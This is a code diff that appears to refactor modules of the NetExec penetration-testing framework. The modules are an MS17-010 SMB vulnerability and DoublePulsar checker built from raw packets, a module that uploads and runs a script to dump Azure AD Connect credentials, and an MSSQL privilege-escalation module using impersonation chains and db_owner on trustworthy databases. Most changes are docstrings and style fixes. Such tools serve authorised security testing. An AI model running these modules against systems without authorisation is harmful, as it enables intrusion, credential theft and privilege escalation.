|
||||||
"\xa6\xd9\xa4\x00",
|
|
||||||
"\x00\x00",
|
|
||||||
"\x0c\x00",
|
|
||||||
"\x42\x00",
|
|
||||||
"\x00\x00",
|
|
||||||
"\x4e\x00",
|
|
||||||
"\x01",
|
|
||||||
"\x00",
|
|
||||||
"\x0e\x00",
|
|
||||||
"\x00\x00",
|
|
||||||
"\x0c\x00" + "\x00" * 12,
|
|
||||||
]
|
|
||||||
|
|
||||||
return generate_smb_proto_payload(netbios, smb_header, trans2_request)
|
# Set the values for the SMB header
|
||||||
|
smb_header = [
|
||||||
|
b"\xFF\x53\x4D\x42", # Server Component: .SMB
|
||||||
|
b"\x25", # SMB Command: Trans2
|
||||||
|
b"\x00\x00\x00\x00", # NT Status
|
||||||
|
b"\x18", # flags
|
||||||
|
b"\x01\x28", # flags2
|
||||||
|
b"\x00\x00", # pid high
|
||||||
|
b"\x00\x00\x00\x00\x00\x00\x00\x00", # sig
|
||||||
|
b"\x00\x00", # Reserved
|
||||||
|
treeid, # Tree ID
|
||||||
|
processid, # Process ID
|
||||||
|
userid, # User ID
|
||||||
|
multiplex_id, # Multiplex ID
|
||||||
|
]
|
||||||
|
|
||||||
|
# Set the values for the transaction request
|
||||||
|
tran_request = [
|
||||||
|
b"\x10", # Word Count
|
||||||
|
b"\x00\x00", # Total Parameter Count
|
||||||
|
b"\x00\x00", # Total Data Count
|
||||||
|
b"\xff\xff", # Max Parameter Count
|
||||||
|
b"\xff\xff", # Max Data Count
|
||||||
|
b"\x00", # Max Setup Count
|
||||||
|
b"\x00", # Reserved
|
||||||
|
b"\x00\x00", # Flags
|
||||||
|
b"\x00\x00\x00\x00", # Timeout
|
||||||
|
b"\x00\x00", # Reserved
|
||||||
|
b"\x00\x00", # Parameter Count
|
||||||
|
b"\x4a\x00", # Parameter Offset
|
||||||
|
b"\x00\x00", # Data Count
|
||||||
|
b"\x4a\x00", # Data Offset
|
||||||
|
b"\x02", # Setup Count
|
||||||
|
b"\x00", # Reserved
|
||||||
|
b"\x23\x00", # SMB Pipe Protocol: Function: PeekNamedPipe (0x0023)
|
||||||
|
b"\x00\x00", # SMB Pipe Protocol: FID
|
||||||
|
b"\x07\x00",
|
||||||
|
b"\x5c\x50\x49\x50\x45\x5c\x00", # \PIPE\
|
||||||
|
]
|
||||||
|
|
||||||
|
return self.generate_smb_proto_payload(netbios, smb_header, tran_request)
|
||||||
|
|
||||||
|
|
||||||
def check(ip, port=445):
|
def trans2_request(self, treeid, processid, userid, multiplex_id):
|
||||||
"""Check if MS17_010 SMB Vulnerability exists."""
|
"""Generate trans2 request.
|
||||||
try:
|
|
||||||
|
Args:
|
||||||
|
----
|
||||||
|
treeid: The treeid parameter.
|
||||||
|
processid: The processid parameter.
|
||||||
|
userid: The userid parameter.
|
||||||
|
multiplex_id: The multiplex_id parameter.
|
||||||
|
|
||||||
|
Returns:
|
||||||
|
-------
|
||||||
|
The generated SMB protocol payload.
|
||||||
|
"""
|
||||||
|
self.logger.debug("generate trans2 request")
|
||||||
|
|
||||||
|
# Define the netbios section of the SMB request
|
||||||
|
netbios = [
|
||||||
|
b"\x00",
|
||||||
|
b"\x00\x00\x4f"
|
||||||
|
]
|
||||||
|
|
||||||
|
# Define the SMB header section of the SMB request
|
||||||
|
smb_header = [
|
||||||
|
b"\xFF\x53\x4D\x42", # 'server_component': .SMB
|
||||||
|
b"\x32", # 'smb_command': Trans2
|
||||||
|
b"\x00\x00\x00\x00",
|
||||||
|
b"\x18",
|
||||||
|
b"\x07\xc0",
|
||||||
|
b"\x00\x00",
|
||||||
|
b"\x00\x00\x00\x00\x00\x00\x00\x00",
|
||||||
|
b"\x00\x00",
|
||||||
|
treeid,
|
||||||
|
processid,
|
||||||
|
userid,
|
||||||
|
multiplex_id,
|
||||||
|
]
|
||||||
|
|
||||||
|
# Define the trans2 request section of the SMB request
|
||||||
|
trans2_request = [
|
||||||
|
b"\x0f",
|
||||||
|
b"\x0c\x00",
|
||||||
|
b"\x00\x00",
|
||||||
|
b"\x01\x00",
|
||||||
|
b"\x00\x00",
|
||||||
|
b"\x00",
|
||||||
|
b"\x00",
|
||||||
|
b"\x00\x00",
|
||||||
|
b"\xa6\xd9\xa4\x00", # Timeout: 3 hours, 3.622 seconds
|
||||||
|
b"\x00\x00",
|
||||||
|
b"\x0c\x00",
|
||||||
|
b"\x42\x00",
|
||||||
|
b"\x00\x00",
|
||||||
|
b"\x4e\x00",
|
||||||
|
b"\x01",
|
||||||
|
b"\x00",
|
||||||
|
b"\x0e\x00", # subcommand: SESSION_SETUP
|
||||||
|
b"\x00\x00",
|
||||||
|
b"\x0c\x00" + b"\x00" * 12,
|
||||||
|
]
|
||||||
|
|
||||||
|
return self.generate_smb_proto_payload(netbios, smb_header, trans2_request)
|
||||||
|
|
||||||
|
|
||||||
|
def check(self, ip, port=445):
|
||||||
|
"""Check if MS17_010 SMB Vulnerability exists.
|
||||||
|
|
||||||
|
Args:
|
||||||
|
----
|
||||||
|
ip (str): The IP address of the target machine.
|
||||||
|
port (int, optional): The port number to connect to. Defaults to 445.
|
||||||
|
|
||||||
|
Returns:
|
||||||
|
-------
|
||||||
|
bool: True if the vulnerability exists, False otherwise.
|
||||||
|
"""
|
||||||
buffersize = 1024
|
buffersize = 1024
|
||||||
timeout = 5.0
|
timeout = 5.0
|
||||||
|
|
||||||
|
# Send smb request based on socket.
|
||||||
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||||
client.settimeout(timeout)
|
client.settimeout(timeout)
|
||||||
client.connect((ip, port))
|
client.connect((ip, port))
|
||||||
|
|
||||||
raw_proto = negotiate_proto_request()
|
# SMB - Negotiate Protocol Request
|
||||||
|
raw_proto = self.negotiate_proto_request()
|
||||||
client.send(raw_proto)
|
client.send(raw_proto)
|
||||||
tcp_response = client.recv(buffersize)
|
tcp_response = client.recv(buffersize)
|
||||||
|
|
||||||
raw_proto = session_setup_andx_request()
|
# SMB - Session Setup AndX Request
|
||||||
|
raw_proto = self.session_setup_andx_request()
|
||||||
client.send(raw_proto)
|
client.send(raw_proto)
|
||||||
tcp_response = client.recv(buffersize)
|
tcp_response = client.recv(buffersize)
|
||||||
netbios = tcp_response[:4]
|
|
||||||
smb_header = tcp_response[4:36]
|
tcp_response[:4]
|
||||||
smb = SMB_HEADER(smb_header)
|
smb_header = tcp_response[4:36] # SMB Header: 32 bytes
|
||||||
|
smb = SmbHeader(smb_header)
|
||||||
|
|
||||||
user_id = struct.pack("<H", smb.user_id)
|
user_id = struct.pack("<H", smb.user_id)
|
||||||
|
|
||||||
|
# parse native_os from Session Setup Andx Response
|
||||||
session_setup_andx_response = tcp_response[36:]
|
session_setup_andx_response = tcp_response[36:]
|
||||||
native_os = session_setup_andx_response[9:].split("\x00")[0]
|
native_os = session_setup_andx_response[9:].split(b"\x00")[0]
|
||||||
|
|
||||||
raw_proto = tree_connect_andx_request(ip, user_id)
|
# SMB - Tree Connect AndX Request
|
||||||
|
raw_proto = self.tree_connect_andx_request(ip, user_id)
|
||||||
client.send(raw_proto)
|
client.send(raw_proto)
|
||||||
tcp_response = client.recv(buffersize)
|
tcp_response = client.recv(buffersize)
|
||||||
|
|
||||||
netbios = tcp_response[:4]
|
tcp_response[:4]
|
||||||
smb_header = tcp_response[4:36]
|
smb_header = tcp_response[4:36] # SMB Header: 32 bytes
|
||||||
smb = SMB_HEADER(smb_header)
|
smb = SmbHeader(smb_header)
|
||||||
|
|
||||||
tree_id = struct.pack("<H", smb.tree_id)
|
tree_id = struct.pack("<H", smb.tree_id)
|
||||||
process_id = struct.pack("<H", smb.process_id)
|
process_id = struct.pack("<H", smb.process_id)
|
||||||
user_id = struct.pack("<H", smb.user_id)
|
user_id = struct.pack("<H", smb.user_id)
|
||||||
multiplex_id = struct.pack("<H", smb.multiplex_id)
|
multiplex_id = struct.pack("<H", smb.multiplex_id)
|
||||||
|
|
||||||
raw_proto = peeknamedpipe_request(tree_id, process_id, user_id, multiplex_id)
|
# SMB - PeekNamedPipe Request
|
||||||
|
raw_proto = self.peeknamedpipe_request(tree_id, process_id, user_id, multiplex_id)
|
||||||
client.send(raw_proto)
|
client.send(raw_proto)
|
||||||
tcp_response = client.recv(buffersize)
|
tcp_response = client.recv(buffersize)
|
||||||
|
|
||||||
netbios = tcp_response[:4]
|
tcp_response[:4]
|
||||||
smb_header = tcp_response[4:36]
|
smb_header = tcp_response[4:36]
|
||||||
smb = SMB_HEADER(smb_header)
|
smb = SmbHeader(smb_header)
|
||||||
|
|
||||||
nt_status = struct.pack("BBH", smb.error_class, smb.reserved1, smb.error_code)
|
nt_status = struct.pack("BBH", smb.error_class, smb.reserved1, smb.error_code)
|
||||||
|
self.logger.debug(f"NT Status: {nt_status}")
|
||||||
|
|
||||||
if nt_status == "\x05\x02\x00\xc0":
|
# 0xC0000205 - STATUS_INSUFF_SERVER_RESOURCES - vulnerable
|
||||||
return True
|
# 0xC0000008 - STATUS_INVALID_HANDLE
|
||||||
elif nt_status in ("\x08\x00\x00\xc0", "\x22\x00\x00\xc0"):
|
# 0xC0000022 - STATUS_ACCESS_DENIED
|
||||||
return False
|
|
||||||
|
if nt_status == b"\x05\x02\x00\xc0":
|
||||||
|
self.logger.highlight(f"[+] {ip} is likely VULNERABLE to MS17-010! ({native_os.decode()})")
|
||||||
|
|
||||||
|
# vulnerable to MS17-010, check for DoublePulsar infection
|
||||||
|
raw_proto = self.trans2_request(tree_id, process_id, user_id, multiplex_id)
|
||||||
|
client.send(raw_proto)
|
||||||
|
tcp_response = client.recv(buffersize)
|
||||||
|
|
||||||
|
tcp_response[:4]
|
||||||
|
smb_header = tcp_response[4:36]
|
||||||
|
smb = SmbHeader(smb_header)
|
||||||
|
|
||||||
|
if smb.multiplex_id == 0x0051:
|
||||||
|
key = self.calculate_doublepulsar_xor_key(smb.signature)
|
||||||
|
self.logger.highlight(f"Host is likely INFECTED with DoublePulsar! - XOR Key: {key.decode()}")
|
||||||
|
elif nt_status in (b"\x08\x00\x00\xc0", b"\x22\x00\x00\xc0"):
|
||||||
|
self.logger.fail(f"{ip} does NOT appear vulnerable")
|
||||||
else:
|
else:
|
||||||
return False
|
self.logger.fail(f"{ip} Unable to detect if this host is vulnerable")
|
||||||
|
|
||||||
except Exception as err:
|
|
||||||
return False
|
|
||||||
finally:
|
|
||||||
client.close()
|
client.close()
|
||||||
|
|
|
@ -3,6 +3,7 @@
|
||||||
# Based on the article : https://blog.xpnsec.com/azuread-connect-for-redteam/
|
# Based on the article : https://blog.xpnsec.com/azuread-connect-for-redteam/
|
||||||
from sys import exit
|
from sys import exit
|
||||||
from os import path
|
from os import path
|
||||||
|
import sys
|
||||||
from nxc.helpers.powershell import get_ps_script
|
from nxc.helpers.powershell import get_ps_script
|
||||||
|
|
||||||
|
|
||||||
|
@ -27,9 +28,7 @@ class NXCModule:
|
||||||
self.module_options = module_options
|
self.module_options = module_options
|
||||||
|
|
||||||
def options(self, context, module_options):
|
def options(self, context, module_options):
|
||||||
"""
|
"""MSOL_PS1 // Path to the msol binary on your computer"""
|
||||||
MSOL_PS1 // Path to the msol binary on your computer
|
|
||||||
"""
|
|
||||||
self.tmp_dir = "C:\\Windows\\Temp\\"
|
self.tmp_dir = "C:\\Windows\\Temp\\"
|
||||||
self.share = "C$"
|
self.share = "C$"
|
||||||
self.tmp_share = self.tmp_dir.split(":")[1]
|
self.tmp_share = self.tmp_dir.split(":")[1]
|
||||||
|
@ -37,7 +36,7 @@ class NXCModule:
|
||||||
self.use_embedded = True
|
self.use_embedded = True
|
||||||
self.msolmdl = self.cmd = ""
|
self.msolmdl = self.cmd = ""
|
||||||
|
|
||||||
with open(get_ps_script("msol_dump/msol_dump.ps1"), "r") as msolsc:
|
with open(get_ps_script("msol_dump/msol_dump.ps1")) as msolsc:
|
||||||
self.msol_embedded = msolsc.read()
|
self.msol_embedded = msolsc.read()
|
||||||
|
|
||||||
if "MSOL_PS1" in module_options:
|
if "MSOL_PS1" in module_options:
|
||||||
|
@ -51,8 +50,14 @@ class NXCModule:
|
||||||
def on_admin_login(self, context, connection):
|
def on_admin_login(self, context, connection):
|
||||||
if self.use_embedded:
|
if self.use_embedded:
|
||||||
file_to_upload = "/tmp/msol.ps1"
|
file_to_upload = "/tmp/msol.ps1"
|
||||||
with open(file_to_upload, "w") as msol:
|
|
||||||
msol.write(self.msol_embedded)
|
try:
|
||||||
|
with open(file_to_upload, "w") as msol:
|
||||||
|
msol.write(self.msol_embedded)
|
||||||
|
except FileNotFoundError:
|
||||||
|
context.log.fail(f"Impersonate file specified '{file_to_upload}' does not exist!")
|
||||||
|
sys.exit(1)
|
||||||
|
|
||||||
else:
|
else:
|
||||||
if path.isfile(self.MSOL_PS1):
|
if path.isfile(self.MSOL_PS1):
|
||||||
file_to_upload = self.MSOL_PS1
|
file_to_upload = self.MSOL_PS1
|
||||||
|
@ -64,25 +69,25 @@ class NXCModule:
|
||||||
with open(file_to_upload, "rb") as msol:
|
with open(file_to_upload, "rb") as msol:
|
||||||
try:
|
try:
|
||||||
connection.conn.putFile(self.share, f"{self.tmp_share}{self.msol}", msol.read)
|
connection.conn.putFile(self.share, f"{self.tmp_share}{self.msol}", msol.read)
|
||||||
context.log.success(f"Msol script successfully uploaded")
|
context.log.success("Msol script successfully uploaded")
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
context.log.fail(f"Error writing file to share {self.tmp_share}: {e}")
|
context.log.fail(f"Error writing file to share {self.tmp_share}: {e}")
|
||||||
return
|
return
|
||||||
try:
|
try:
|
||||||
if self.cmd == "":
|
if self.cmd == "":
|
||||||
context.log.display(f"Executing the script")
|
context.log.display("Executing the script")
|
||||||
p = self.exec_script(context, connection)
|
p = self.exec_script(context, connection)
|
||||||
for line in p.splitlines():
|
for line in p.splitlines():
|
||||||
p1, p2 = line.split(" ", 1)
|
p1, p2 = line.split(" ", 1)
|
||||||
context.log.highlight(f"{p1} {p2}")
|
context.log.highlight(f"{p1} {p2}")
|
||||||
else:
|
else:
|
||||||
context.log.fail(f"Script Execution Impossible")
|
context.log.fail("Script Execution Impossible")
|
||||||
|
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
context.log.fail(f"Error running command: {e}")
|
context.log.fail(f"Error running command: {e}")
|
||||||
finally:
|
finally:
|
||||||
try:
|
try:
|
||||||
connection.conn.deleteFile(self.share, f"{self.tmp_share}{self.msol}")
|
connection.conn.deleteFile(self.share, f"{self.tmp_share}{self.msol}")
|
||||||
context.log.success(f"Msol script successfully deleted")
|
context.log.success("Msol script successfully deleted")
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
context.log.fail(f"[OPSEC] Error deleting msol script on {self.share}: {e}")
|
context.log.fail(f"[OPSEC] Error deleting msol script on {self.share}: {e}")
|
||||||
|
|
|
@ -1,9 +1,5 @@
|
||||||
#!/usr/bin/env python3
|
|
||||||
# -*- coding: utf-8 -*-
|
|
||||||
# Author:
|
# Author:
|
||||||
# Romain de Reydellet (@pentest_soka)
|
# Romain de Reydellet (@pentest_soka)
|
||||||
|
|
||||||
|
|
||||||
from nxc.helpers.logger import highlight
|
from nxc.helpers.logger import highlight
|
||||||
|
|
||||||
|
|
||||||
|
@ -22,9 +18,7 @@ class User:
|
||||||
|
|
||||||
|
|
||||||
class NXCModule:
|
class NXCModule:
|
||||||
"""
|
"""Enumerate MSSQL privileges and exploit them"""
|
||||||
Enumerate MSSQL privileges and exploit them
|
|
||||||
"""
|
|
||||||
|
|
||||||
name = "mssql_priv"
|
name = "mssql_priv"
|
||||||
description = "Enumerate and exploit MSSQL privileges"
|
description = "Enumerate and exploit MSSQL privileges"
|
||||||
|
@ -92,9 +86,20 @@ class NXCModule:
|
||||||
elif target_user.dbowner:
|
elif target_user.dbowner:
|
||||||
self.do_dbowner_privesc(target_user.dbowner, exec_as)
|
self.do_dbowner_privesc(target_user.dbowner, exec_as)
|
||||||
if self.is_admin_user(self.current_username):
|
if self.is_admin_user(self.current_username):
|
||||||
self.context.log.success(f"{self.current_username} is now a sysadmin! " + highlight("({})".format(self.context.conf.get("nxc", "pwn3d_label"))))
|
self.context.log.success(f"{self.current_username} is now a sysadmin! " + highlight(f"({self.context.conf.get('nxc', 'pwn3d_label')})"))
|
||||||
|
|
||||||
def build_exec_as_from_path(self, target_user):
|
def build_exec_as_from_path(self, target_user):
|
||||||
|
"""
|
||||||
|
Builds an 'exec_as' path based on the given target user.
|
||||||
|
|
||||||
|
Args:
|
||||||
|
----
|
||||||
|
target_user (User): The target user for building the 'exec_as' path.
|
||||||
|
|
||||||
|
Returns:
|
||||||
|
-------
|
||||||
|
str: The 'exec_as' path built from the target user's username and its parent usernames.
|
||||||
|
"""
|
||||||
path = [target_user.username]
|
path = [target_user.username]
|
||||||
parent = target_user.parent
|
parent = target_user.parent
|
||||||
while parent:
|
while parent:
|
||||||
|
@ -105,6 +110,19 @@ class NXCModule:
|
||||||
return self.sql_exec_as(reversed(path))
|
return self.sql_exec_as(reversed(path))
|
||||||
|
|
||||||
def browse_path(self, context, initial_user: User, user: User) -> User:
|
def browse_path(self, context, initial_user: User, user: User) -> User:
|
||||||
|
"""
|
||||||
|
Browse the path of user impersonation.
|
||||||
|
|
||||||
|
Parameters
|
||||||
|
----------
|
||||||
|
context (Context): The context of the function.
|
||||||
|
initial_user (User): The initial user.
|
||||||
|
user (User): The user to browse the path for.
|
||||||
|
|
||||||
|
Returns
|
||||||
|
-------
|
||||||
|
User: The user that can be impersonated.
|
||||||
|
"""
|
||||||
if initial_user.is_sysadmin:
|
if initial_user.is_sysadmin:
|
||||||
self.context.log.success(f"{initial_user.username} is sysadmin")
|
self.context.log.success(f"{initial_user.username} is sysadmin")
|
||||||
return initial_user
|
return initial_user
|
||||||
|
@ -113,7 +131,7 @@ class NXCModule:
|
||||||
return initial_user
|
return initial_user
|
||||||
for grantor in user.grantors:
|
for grantor in user.grantors:
|
||||||
if grantor.is_sysadmin:
|
if grantor.is_sysadmin:
|
||||||
self.context.log.success(f"{user.username} can impersonate: " f"{grantor.username} (sysadmin)")
|
self.context.log.success(f"{user.username} can impersonate: {grantor.username} (sysadmin)")
|
||||||
return grantor
|
return grantor
|
||||||
elif grantor.dbowner:
|
elif grantor.dbowner:
|
||||||
self.context.log.success(f"{user.username} can impersonate: {grantor.username} (which can privesc via dbowner)")
|
self.context.log.success(f"{user.username} can impersonate: {grantor.username} (which can privesc via dbowner)")
|
||||||
|
@ -123,23 +141,50 @@ class NXCModule:
|
||||||
return self.browse_path(context, initial_user, grantor)
|
return self.browse_path(context, initial_user, grantor)
|
||||||
|
|
||||||
def query_and_get_output(self, query):
|
def query_and_get_output(self, query):
|
||||||
# try:
|
return self.mssql_conn.sql_query(query)
|
||||||
results = self.mssql_conn.sql_query(query)
|
|
||||||
# self.mssql_conn.printRows()
|
|
||||||
# query_output = self.mssql_conn._MSSQL__rowsPrinter.getMessage()
|
|
||||||
# query_output = results.strip("\n-")
|
|
||||||
return results
|
|
||||||
# except Exception as e:
|
|
||||||
# return False
|
|
||||||
|
|
||||||
def sql_exec_as(self, grantors: list) -> str:
|
def sql_exec_as(self, grantors: list) -> str:
|
||||||
exec_as = []
|
"""
|
||||||
for grantor in grantors:
|
Generates an SQL statement to execute a command using the specified list of grantors.
|
||||||
exec_as.append(f"EXECUTE AS LOGIN = '{grantor}';")
|
|
||||||
|
Parameters
|
||||||
|
----------
|
||||||
|
grantors (list): A list of grantors, each representing a login.
|
||||||
|
|
||||||
|
Returns
|
||||||
|
-------
|
||||||
|
str: The SQL statement to execute the command using the grantors.
|
||||||
|
"""
|
||||||
|
exec_as = [f"EXECUTE AS LOGIN = '{grantor}';" for grantor in grantors]
|
||||||
return "".join(exec_as)
|
return "".join(exec_as)
|
||||||
|
|
||||||
def perform_impersonation_check(self, user: User, grantors=[]):
|
def perform_impersonation_check(self, user: User, grantors=None):
|
||||||
|
"""
|
||||||
|
Performs an impersonation check for a given user.
|
||||||
|
|
||||||
|
Args:
|
||||||
|
----
|
||||||
|
user (User): The user for whom the impersonation check is being performed.
|
||||||
|
grantors (list): A list of grantors. Default is an empty list.
|
||||||
|
|
||||||
|
Returns:
|
||||||
|
-------
|
||||||
|
None
|
||||||
|
|
||||||
|
Description:
|
||||||
|
This function checks if the user has the necessary privileges to perform impersonation.
|
||||||
|
If the user has the necessary privileges, the function returns without performing any further checks.
|
||||||
|
If the user does not have the necessary privileges, the function retrieves a list of grantors
|
||||||
|
who can impersonate the user and performs the same impersonation check on each grantor recursively.
|
||||||
|
If a new grantor is found, it is added to the list of grantors and the impersonation check is performed on it.
|
||||||
|
|
||||||
|
Example Usage:
|
||||||
|
perform_impersonation_check(user, grantors=['admin', 'manager'])
|
||||||
|
|
||||||
|
"""
|
||||||
# build EXECUTE AS if any grantors is specified
|
# build EXECUTE AS if any grantors is specified
|
||||||
|
if grantors is None:
|
||||||
|
grantors = []
|
||||||
exec_as = self.sql_exec_as(grantors)
|
exec_as = self.sql_exec_as(grantors)
|
||||||
# do we have any privilege ?
|
# do we have any privilege ?
|
||||||
if self.update_priv(user, exec_as):
|
if self.update_priv(user, exec_as):
|
||||||
|
@ -160,6 +205,18 @@ class NXCModule:
|
||||||
self.perform_impersonation_check(new_user, grantors)
|
self.perform_impersonation_check(new_user, grantors)
|
||||||
|
|
||||||
def update_priv(self, user: User, exec_as=""):
|
def update_priv(self, user: User, exec_as=""):
|
||||||
|
"""
|
||||||
|
Update the privileges of a user.
|
||||||
|
|
||||||
|
Args:
|
||||||
|
----
|
||||||
|
user (User): The user whose privileges need to be updated.
|
||||||
|
exec_as (str): The username of the user executing the function.
|
||||||
|
|
||||||
|
Returns:
|
||||||
|
-------
|
||||||
|
bool: True if the user is an admin user and their privileges are updated successfully, False otherwise.
|
||||||
|
"""
|
||||||
if self.is_admin_user(user.username):
|
if self.is_admin_user(user.username):
|
||||||
user.is_sysadmin = True
|
user.is_sysadmin = True
|
||||||
return True
|
return True
|
||||||
|
@ -167,96 +224,176 @@ class NXCModule:
|
||||||
return user.dbowner
|
return user.dbowner
|
||||||
|
|
||||||
def get_current_username(self) -> str:
|
def get_current_username(self) -> str:
|
||||||
|
"""
|
||||||
|
Retrieves the current username.
|
||||||
|
|
||||||
|
:param self: The instance of the class.
|
||||||
|
:return: The current username as a string.
|
||||||
|
:rtype: str
|
||||||
|
"""
|
||||||
return self.query_and_get_output("select SUSER_NAME()")[0][""]
|
return self.query_and_get_output("select SUSER_NAME()")[0][""]
|
||||||
|
|
||||||
def is_admin(self, exec_as="") -> bool:
|
def is_admin(self, exec_as="") -> bool:
|
||||||
|
"""
|
||||||
|
Checks if the user is an admin.
|
||||||
|
|
||||||
|
Args:
|
||||||
|
----
|
||||||
|
exec_as (str): The user to execute the query as. Default is an empty string.
|
||||||
|
|
||||||
|
Returns:
|
||||||
|
-------
|
||||||
|
bool: True if the user is an admin, False otherwise.
|
||||||
|
"""
|
||||||
res = self.query_and_get_output(exec_as + "SELECT IS_SRVROLEMEMBER('sysadmin')")
|
res = self.query_and_get_output(exec_as + "SELECT IS_SRVROLEMEMBER('sysadmin')")
|
||||||
self.revert_context(exec_as)
|
self.revert_context(exec_as)
|
||||||
is_admin = res[0][""]
|
is_admin = res[0][""]
|
||||||
self.context.log.debug(f"IsAdmin Result: {is_admin}")
|
self.context.log.debug(f"IsAdmin Result: {is_admin}")
|
||||||
if is_admin:
|
if is_admin:
|
||||||
self.context.log.debug(f"User is admin!")
|
self.context.log.debug("User is admin!")
|
||||||
self.admin_privs = True
|
self.admin_privs = True
|
||||||
return True
|
return True
|
||||||
else:
|
else:
|
||||||
return False
|
return False
|
||||||
|
|
||||||
def get_databases(self, exec_as="") -> list:
|
def get_databases(self, exec_as="") -> list:
|
||||||
|
"""
|
||||||
|
Retrieves a list of databases from the SQL server.
|
||||||
|
|
||||||
|
Args:
|
||||||
|
----
|
||||||
|
exec_as (str, optional): The username to execute the query as. Defaults to "".
|
||||||
|
|
||||||
|
Returns:
|
||||||
|
-------
|
||||||
|
list: A list of database names.
|
||||||
|
"""
|
||||||
res = self.query_and_get_output(exec_as + "SELECT name FROM master..sysdatabases")
|
res = self.query_and_get_output(exec_as + "SELECT name FROM master..sysdatabases")
|
||||||
self.revert_context(exec_as)
|
self.revert_context(exec_as)
|
||||||
self.context.log.debug(f"Response: {res}")
|
self.context.log.debug(f"Response: {res}")
|
||||||
self.context.log.debug(f"Response Type: {type(res)}")
|
self.context.log.debug(f"Response Type: {type(res)}")
|
||||||
tables = [table["name"] for table in res]
|
return [table["name"] for table in res]
|
||||||
return tables
|
|
||||||
|
|
||||||
def is_dbowner(self, database, exec_as="") -> bool:
|
def is_db_owner(self, database, exec_as="") -> bool:
|
||||||
query = f"""select rp.name as database_role
|
"""
|
||||||
from [{database}].sys.database_role_members drm
|
Check if the specified database is owned by the current user.
|
||||||
join [{database}].sys.database_principals rp
|
|
||||||
on (drm.role_principal_id = rp.principal_id)
|
Args:
|
||||||
join [{database}].sys.database_principals mp
|
----
|
||||||
on (drm.member_principal_id = mp.principal_id)
|
database (str): The name of the database to check.
|
||||||
where rp.name = 'db_owner' and mp.name = SYSTEM_USER"""
|
exec_as (str, optional): The name of the user to execute the query as. Defaults to "".
|
||||||
self.context.log.debug(f"Query: {query}")
|
|
||||||
|
Returns:
|
||||||
|
-------
|
||||||
|
bool: True if the database is owned by the current user, False otherwise.
|
||||||
|
"""
|
||||||
|
query = f"""
|
||||||
|
SELECT rp.name AS database_role
|
||||||
|
FROM [{database}].sys.database_role_members drm
|
||||||
|
JOIN [{database}].sys.database_principals rp ON (drm.role_principal_id = rp.principal_id)
|
||||||
|
JOIN [{database}].sys.database_principals mp ON (drm.member_principal_id = mp.principal_id)
|
||||||
|
WHERE rp.name = 'db_owner' AND mp.name = SYSTEM_USER
|
||||||
|
"""
|
||||||
res = self.query_and_get_output(exec_as + query)
|
res = self.query_and_get_output(exec_as + query)
|
||||||
self.context.log.debug(f"Response: {res}")
|
if res and "database_role" in res[0] and res[0]["database_role"] == "db_owner":
|
||||||
self.revert_context(exec_as)
|
return True
|
||||||
if res:
|
|
||||||
if "database_role" in res[0] and res[0]["database_role"] == "db_owner":
|
|
||||||
return True
|
|
||||||
else:
|
|
||||||
return False
|
|
||||||
return False
|
return False
|
||||||
|
|
||||||
def find_dbowner_priv(self, databases, exec_as="") -> list:
|
def find_dbowner_priv(self, databases, exec_as="") -> list:
|
||||||
match = []
|
"""
|
||||||
for database in databases:
|
Finds the list of databases for which the specified user is the owner.
|
||||||
if self.is_dbowner(database, exec_as):
|
|
||||||
match.append(database)
|
|
||||||
return match
|
|
||||||
|
|
||||||
def find_trusted_db(self, exec_as="") -> list:
|
Args:
|
||||||
query = """SELECT d.name AS DATABASENAME
|
----
|
||||||
FROM sys.server_principals r
|
databases (list): A list of database names.
|
||||||
INNER JOIN sys.server_role_members m
|
exec_as (str, optional): The user to execute the check as. Defaults to "".
|
||||||
ON r.principal_id = m.role_principal_id
|
|
||||||
INNER JOIN sys.server_principals p ON
|
Returns:
|
||||||
p.principal_id = m.member_principal_id
|
-------
|
||||||
inner join sys.databases d
|
list: A list of database names for which the specified user is the owner.
|
||||||
on suser_sname(d.owner_sid) = p.name
|
"""
|
||||||
WHERE is_trustworthy_on = 1 AND d.name NOT IN ('MSDB')
|
return [database for database in databases if self.is_db_owner(database, exec_as)]
|
||||||
and r.type = 'R' and r.name = N'sysadmin'"""
|
|
||||||
res = self.query_and_get_output(exec_as + query)
|
def find_trusted_databases(self, exec_as="") -> list:
|
||||||
|
"""
|
||||||
|
Find trusted databases.
|
||||||
|
|
||||||
|
:param exec_as: The user under whose context the query should be executed. Defaults to an empty string.
|
||||||
|
:type exec_as: str
|
||||||
|
:return: A list of trusted database names.
|
||||||
|
:rtype: list
|
||||||
|
"""
|
||||||
|
query = """
|
||||||
|
SELECT d.name AS DATABASENAME
|
||||||
|
FROM sys.server_principals r
|
||||||
|
INNER JOIN sys.server_role_members m ON r.principal_id = m.role_principal_id
|
||||||
|
INNER JOIN sys.server_principals p ON p.principal_id = m.member_principal_id
|
||||||
|
INNER JOIN sys.databases d ON suser_sname(d.owner_sid) = p.name
|
||||||
|
WHERE is_trustworthy_on = 1 AND d.name NOT IN ('MSDB')
|
||||||
|
AND r.type = 'R' AND r.name = N'sysadmin'
|
||||||
|
"""
|
||||||
|
result = self.query_and_get_output(exec_as + query)
|
||||||
self.revert_context(exec_as)
|
self.revert_context(exec_as)
|
||||||
return res
|
return result
|
||||||
|
|
||||||
def check_dbowner_privesc(self, exec_as=""):
|
def check_dbowner_privesc(self, exec_as=""):
|
||||||
|
"""
|
||||||
|
Check if a database owner has privilege escalation.
|
||||||
|
|
||||||
|
:param exec_as: The user to execute the check as. Defaults to an empty string.
|
||||||
|
:type exec_as: str
|
||||||
|
:return: The first trusted database that has a database owner with privilege escalation, or None if no such database is found.
|
||||||
|
:rtype: str or None
|
||||||
|
"""
|
||||||
databases = self.get_databases(exec_as)
|
databases = self.get_databases(exec_as)
|
||||||
dbowner = self.find_dbowner_priv(databases, exec_as)
|
dbowner_privileged_databases = self.find_dbowner_priv(databases, exec_as)
|
||||||
trusted_db = self.find_trusted_db(exec_as)
|
trusted_databases = self.find_trusted_databases(exec_as)
|
||||||
# return the first match
|
|
||||||
for db in dbowner:
|
for db in dbowner_privileged_databases:
|
||||||
if db in trusted_db:
|
if db in trusted_databases:
|
||||||
return db
|
return db
|
||||||
return None
|
|
||||||
|
|
||||||
def do_dbowner_privesc(self, database, exec_as=""):
|
def do_dbowner_privesc(self, database, exec_as=""):
|
||||||
# change context if necessary
|
"""
|
||||||
|
